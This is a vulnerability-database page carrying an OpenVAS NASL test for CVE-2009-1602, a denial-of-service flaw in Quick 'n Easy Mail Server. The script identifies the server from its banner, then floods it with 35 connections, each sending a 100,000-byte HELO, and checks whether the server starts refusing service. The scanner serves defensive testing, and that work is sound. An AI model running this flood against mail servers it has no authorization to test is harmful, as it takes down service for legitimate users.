Lucene search
K

Quick 'n Easy Mail Server SMTP Request Remote Denial Of Service Vulnerability

🗓️ 06 May 2009 00:00:00Reported by This script is Copyright (C) 2009 Greenbone Networks GmbHType 
openvas
 openvas
🔗 plugins.openvas.org👁 14 Views

Quick 'n Easy Mail Server SMTP Request Remote Denial Of Service Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-1602
4 May 200900:00
circl
CVE
CVE-2009-1602
11 May 200915:19
cve
Cvelist
CVE-2009-1602
11 May 200915:19
cvelist
EUVD
EUVD-2009-1597
7 Oct 202500:30
euvd
NVD
CVE-2009-1602
11 May 200915:30
nvd
OpenVAS
Quick 'n Easy Mail Server 3.3 SMTP Request Remote DoS Vulnerability
6 May 200900:00
openvas
Prion
Design/Logic Flaw
11 May 200915:30
prion
SourceLink
securityfocuswww.securityfocus.com/bid/34814
###############################################################################
# OpenVAS Vulnerability Test
# $Id: quick_easy_mail_server_34814.nasl 5016 2017-01-17 09:06:21Z teissa $
#
# Quick 'n Easy Mail Server SMTP Request Remote Denial Of Service Vulnerability
#
# Authors
# Michael Meyer
#
# Increased crap length to 10000 (By Michael Meyer, 2009-05-15)
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_summary = "Quick 'n Easy Mail Server is prone to a denial-of-service
  vulnerability because it fails to adequately handle multiple socket
  requests.

  Attackers can exploit this issue to cause the affected application
  to reject SMTP requests, denying service to legitimate users.

  The demonstration release of Quick 'n Easy Mail Server 3.3 is
  vulnerable; other versions may also be affected.";


if (description)
{
 script_id(100185);
 script_version("$Revision: 5016 $");
 script_tag(name:"last_modification", value:"$Date: 2017-01-17 10:06:21 +0100 (Tue, 17 Jan 2017) $");
 script_tag(name:"creation_date", value:"2009-05-06 14:55:27 +0200 (Wed, 06 May 2009)");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_cve_id("CVE-2009-1602");
 script_bugtraq_id(34814);

 script_name("Quick 'n Easy Mail Server SMTP Request Remote Denial Of Service Vulnerability");


 script_tag(name:"qod_type", value:"remote_vul");
 script_category(ACT_DENIAL);
 script_family("SMTP problems");
 script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
 script_dependencies("find_service.nasl", "smtpserver_detect.nasl");
 script_require_ports("Services/smtp", 25);
 script_tag(name : "summary" , value : tag_summary);
 script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/34814");
 exit(0);
}


include("smtp_func.inc");

if(safe_checks()){
  exit(0);
}

port = get_kb_item("Services/smtp");
if(!port){
  port = 25;
}

if(get_port_state(port))
{
  soctcp25 = open_sock_tcp(port);
  if (soctcp25)
  {
    bannertxt = smtp_recv_banner(socket:soctcp25);
    if(!bannertxt)
    {
      close(soctcp25);
      exit(0);
    }

    if(!("Quick 'n Easy Mail Server" >< bannertxt))
    {
      close(soctcp25);
      exit(0);
    }

    close(soctcp25);
    data = string("HELO ");
    data += crap(length: 100000, data:"[email protected]");
    data += string("\r\n");
    for(i=0; i<35; i++)
    {
      soctcp = open_sock_tcp(port);
      send(socket:soctcp, data:data);
      ehlotxt = smtp_recv_line(socket:soctcp);
      if(egrep(pattern:"421 Service not available", string: ehlotxt))
      {
        security_message(port:port);
        close(soctcp);
        exit(0);
      }
    }
  }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jan 2017 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.06214
14